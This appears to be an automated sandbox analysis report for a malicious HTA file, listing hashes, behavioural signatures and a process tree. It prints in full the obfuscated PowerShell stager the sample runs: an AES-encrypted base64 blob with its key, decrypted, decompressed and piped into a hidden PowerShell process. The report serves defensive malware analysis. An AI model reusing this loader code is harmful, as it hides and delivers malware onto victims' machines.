Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23/02/2024, 07:04
Static task
static1
Behavioral task
behavioral1
Sample
qxhbj.hta
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
qxhbj.hta
Resource
win10v2004-20240221-en
General
-
Target
qxhbj.hta
-
Size
74KB
-
MD5
b6079dca9dd507c2cd9e5d988edf3822
-
SHA1
263585b64c4f8d60293764053aa6cb90673dc999
-
SHA256
4551133648c40891ae3153c93c96f6fdd8c23b9c4fd3a0cb61a5092da2f38f41
-
SHA512
a0387c9e2374998960f87cc1c415fa29465c04c5afd06023f82a0b81483805951512111acadaa54a6af79502d467171f922ef694fd71cf45995ecba5370f60cb
-
SSDEEP
768:Il/RkkYVb3FT8kQ7M+HO0r8aul0UchiMk0sS7:GukYVbd8ke3uC5ulAZuS7
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2932 powershell.exe 2656 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 2656 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2772 wrote to memory of 2932 2772 mshta.exe 28 PID 2772 wrote to memory of 2932 2772 mshta.exe 28 PID 2772 wrote to memory of 2932 2772 mshta.exe 28 PID 2772 wrote to memory of 2932 2772 mshta.exe 28 PID 2932 wrote to memory of 2656 2932 powershell.exe 30 PID 2932 wrote to memory of 2656 2932 powershell.exe 30 PID 2932 wrote to memory of 2656 2932 powershell.exe 30 PID 2932 wrote to memory of 2656 2932 powershell.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\qxhbj.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $fZSRGpe = 'AAAAAAAAAAAAAAAAAAAAANe8iT6aUdWnM9cxbq5YpLTsUt3/KlEeLn2U+/ec/zbmIgP8b7r79bvA0eFBN2R5WIMVa8tg04mq8S3KQz9bxkeJ1MF2CNCV4TUmuKgtK4GuTDoZNIdN1yHi0KmulMM+Mj1vEOpnWpSxJV3NI95kAMuyAv0tZqsdcA9TriOVw8uSoGuTKMAvZafG0D4G2NKrrukOSclLQxud2ZgA302sN6wlaXsdbYXXbFNVlB4LSqK/t5ytYmwR+8HmLt5Uu1xtTlA11PAJR86Veo9t7lTYBl5q7hQvusWiezMEIl+hNKgJZ9xapkoj9rxsHwaxSdLhM1hxa3aspjB0tBwrcI5ddDaIZB1Yged9d0bAkM9ke2a+90eXhdIfXWlyCsBBQoC9TYDPQ5086LN3Ai1YHkrX4dta5TD9hD8mjV+zfor8c4CpIK+Mzz15IPkk7nTsN+x/QVPHQbssz50B6lnBKAMncfU9qlYqEOIh55Qs6pLP7/CoLKB1zBnSysAE2aKUwhPJtTBzTruFB7IZu5lvxp9eDwP4g8co2sLAfn9uLVIr6mXVs/FadscZCBRHlTjRMvwn23WQcIyxnix+0anud0h/nL5sYkPt8ApDuJs75tM/hL9D7sZKZleAJtypCgCd/tQ/Np21x16j9sRLR5uU0V7P1wXGvxlZWoBqTB7ElfMQ1gP/hMj4tEJL4GDxJjJst7FdX2wXL8YD8bPlaiIOQDyuauj6sWRwtTuJG4oKjbTlKTqG6UVP7KKQt1W0JY91SnkH4zI1yXY78p5q02vldgB7gbN4Gr8mdbs75elM4+JC5SzcVmvib5kRJ0z4XAhLc/fVK6F2Xsry01hJXZ4l2bmcV8yGml2/ZW03oNLtHV3f2n9bbo0Vf77cmPkHnf4zSB9iIZY74EVhqmsDcrft1c2Ir+S00lHT8oFmf9QZyVYEa58YmjId+17rtHm7cyQ2QBpQMP71S54OEV5VEUf6Q8K/eE5vp3ObTvDVP0GbBF27TNmo09HCBPqbfLKgH9ONAemoeQgRO5aiwZhbEcpyzjaEJM7yOWKJi/Jev1kbbmN5x29LJHIBnq8inXyFa8cALUG2xHqyYtKgl1ZHxBo8ZLrL+RXBtKOja5Nyj9o6D2mipACg0K0mL8T5uWJsmAgY+Sc/wZv+N+2XMvC5tei9uGal5wnbRVeaY2wUHipCdT546YihLEjkKLg1gkH8rZkIX4IoUA==';$fRNnXP = 'c3BWRnJZZE10Z3JVbG5ySWpqZ09QWFVLd2FzckhiblU=';$dmIEqwzR = New-Object 'System.Security.Cryptography.AesManaged';$dmIEqwzR.Mode = [System.Security.Cryptography.CipherMode]::ECB;$dmIEqwzR.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$dmIEqwzR.BlockSize = 128;$dmIEqwzR.KeySize = 256;$dmIEqwzR.Key = [System.Convert]::FromBase64String($fRNnXP);$LmEgn = [System.Convert]::FromBase64String($fZSRGpe);$dBvbIHmm = $LmEgn[0..15];$dmIEqwzR.IV = $dBvbIHmm;$jxZcIjVXh = $dmIEqwzR.CreateDecryptor();$wekAqpkqE = $jxZcIjVXh.TransformFinalBlock($LmEgn, 16, $LmEgn.Length - 16);$dmIEqwzR.Dispose();$XWqxhr = New-Object System.IO.MemoryStream( , $wekAqpkqE );$shQNvH = New-Object System.IO.MemoryStream;$XXlHwHgWC = New-Object System.IO.Compression.GzipStream $XWqxhr, ([IO.Compression.CompressionMode]::Decompress);$XXlHwHgWC.CopyTo( $shQNvH );$XXlHwHgWC.Close();$XWqxhr.Close();[byte[]] $uQlWtSPQ = $shQNvH.ToArray();$mLKlE = [System.Text.Encoding]::UTF8.GetString($uQlWtSPQ);$mLKlE | powershell -2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD54011b14119173ff74c8718f7fa0a9ce6
SHA1c0c09f0ceaa5e4e1a76d7e268e97a8c781f9184b
SHA2561af34e55da8c8653a1fe86e678e33acbaf261b0b61e263b4880d9bc57893471c
SHA512969bfd6904f7d15e2de47292dad6fac0dfb455710961b2cc99bf928be4b8d850f69fae80fb2c55aad5804a3c7dc2da88f66cb5fc3e59778bbda91b07d7ea5ec7